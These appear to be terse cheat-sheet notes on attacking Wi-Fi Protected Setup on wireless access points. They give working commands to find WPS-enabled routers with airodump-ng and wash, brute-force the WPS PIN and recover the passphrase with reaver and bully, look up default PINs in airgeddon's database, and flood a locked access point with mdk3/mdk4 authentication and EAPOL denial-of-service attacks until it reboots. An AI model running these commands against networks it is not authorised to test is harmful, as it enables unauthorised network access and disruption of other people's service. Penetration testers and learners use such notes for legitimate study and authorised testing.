WPS

Enum:

airodump-ng

airodump-ng --wps wlan0mon

Wash

wash -i wlan0mon
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
00:0A:D0:97:39:6F    1  -88  2.0  No   Broadcom  linksys

Version 2 mandated mitigations to prevent brute forcing, which may just slow down a bruteforce attack. The Lck indicates if WPS is locked, meaning an attack is pointless at this time.

Wash scans the 2.4GHz band by default. To make it scan 5GHz, we can append the -5 option to the command.

Attack:

Reaver:

sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -k

add the channel parameter (-c) followed by the channel.

Bully:

bully -d  -v 4 -m  wlan0mon

Once the PIN is recovered, we can provide it to bully to do a single PIN try, using -B -p followed by the PIN, to recover the passphrase.

Both reaver and bully can verify a single pin, and in order to use an empty PIN, we will use -p ''

Airegeddon:

install:

sudo apt install airgeddon

We'll use source to execute a shell script, known_pins.db, which loads an array of PINs into memory. Finally, we'll check the database for an AP whose BSSID starts with "0013F7". It is case sensitive and the first three bytes must be uppercase.

source /usr/share/airgeddon/known_pins.db
echo ${PINDB["0013F7"]}

Potential issues:

restart if:

[!] WPS transaction failed (code: 0x03), re-trying last pin

WPS Lock

When WPS is locked, we can do a denial of service on the access point using mdk31 or its successor, mdk4. In some cases, this will trigger a reboot of the AP, which releases the lock.

We can use authentication DoS, EAPOL Start DoS, or the EAPOL Logoff flood attack. We may need multiple wireless cards to carry out the attack, overflow the AP, and make it crash so that it reboots.